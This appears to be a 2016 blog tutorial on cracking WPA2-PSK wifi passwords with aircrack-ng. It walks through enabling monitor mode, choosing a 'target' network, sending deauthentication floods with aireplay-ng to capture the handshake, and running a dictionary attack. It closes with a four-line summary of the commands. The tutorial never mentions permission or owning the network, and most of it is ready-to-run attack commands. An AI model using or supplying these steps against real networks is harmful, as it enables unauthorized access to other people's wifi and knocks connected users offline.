Monday, 1 August 2016

Cracking WPA2 wifi password

o you can't crack it with a click and there is no software that will give you the password without some hard work ...
don't run away still you can crack it  with few steps here :) and we will do it using aircrack-ng

requirements: To crack a wpa2-psk encrypted wifi password using aircrack-ng

1- Kali Linux or any Linux system with aircrack-ng installed
  a- if you don't have aircrack-ng suite get it by this commend in terminal
sudo apt-get install aircrack-ng
2- a wireless network adapter that support monitor mode like
  a- Alfa 2W AWUS036NH
  b- Alfa AWUS036H
  c- wifiy-city 56G
  d- and you can check this page here for card compatibility compatibility drivers
3- a word list comprising of all the possible different combination of pass-phrases

Now let's get to work
i will be using wifiy-city 56G card on Kali linux 2 sana

1) open up your terminal as root and type
this will show you all the networking interfaces connected to your device.

if your wireless network adapter is working fine you should see the " wlan0 " the name may change if you have more then one connected wireless adapter.

2) now to start monitor mode type
airmon-ng start wlan0 
'airmon-ng' is a traffic monitoring tool
‘wlan0’ is your wireless interface

after this commend we started the monitor mode
as it's seen the monitor mode is working under wlan0mon , so this is your card name for now
in the red area a list of process id’s that cause trouble during the process so kill those processes by typing
 in my case
kill 743 898 1070 1071 1081 
 now type ifconfig and this will show the newly set monitoring interface i.e, wlan0mon . in most case it will be mon0 .

3) to show list of available WiFi network type
airodump-ng wlan0mon

airodump-ng is a wifi packets capturing tool
wlan0mon is my  monitoring interface
airodump-ng  will start capturing all packets and from the captured packets
select your target and note its ‘bssid’ (bssid = base service set identifier) and channel
then stop the capture using “cntrl+c“.

4) Start capturing the packets of your target network
type the following command
airodump-ng -c -w --bssid wlan0mon 
i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 

 this will start the capturing of packets.
and if you get the handshake you wont need the aireplay command...
if you don't get the handshake yet
while the capturing of packets goes on, open a new terminal as root and type
aireplay-ng -0 0 -a mon0
aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
-0 = number associated for deauthentication,
0 = deauth count,
-a = bssid) here we are trying to send a deauthentication request.
In my case the command looks like
aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0mon

after few seconds stop it using cntrl+c.
now after we have successful captured the wpa handshake

5) Stop the capturing using cntrl+c and type “ls” that would bring up all the current directories and files.
Select the file with “.cap“extension and type the following command
aircrack-ng -w
aircrack-ng is a tool that helps in cracking the password
In my case the command looks like
aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
For the Wordlist Check this Post Best Password dictionary
Now it starts finding suitable passphrase.

and now all you have to do is wait till you see the lovely news ( KEY Found  ( your key is here ;) ).

all Step in few lines
1) airodump-ng wlan0mon
2) airodump-ng -c 9 -w wifi  --bssid C4:6E:1F:F6:34:B8 wlan0mon
3) aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
4) aircrack-ng -w /usr/share/wordlists/more_than_8.txt wifi-01.cap

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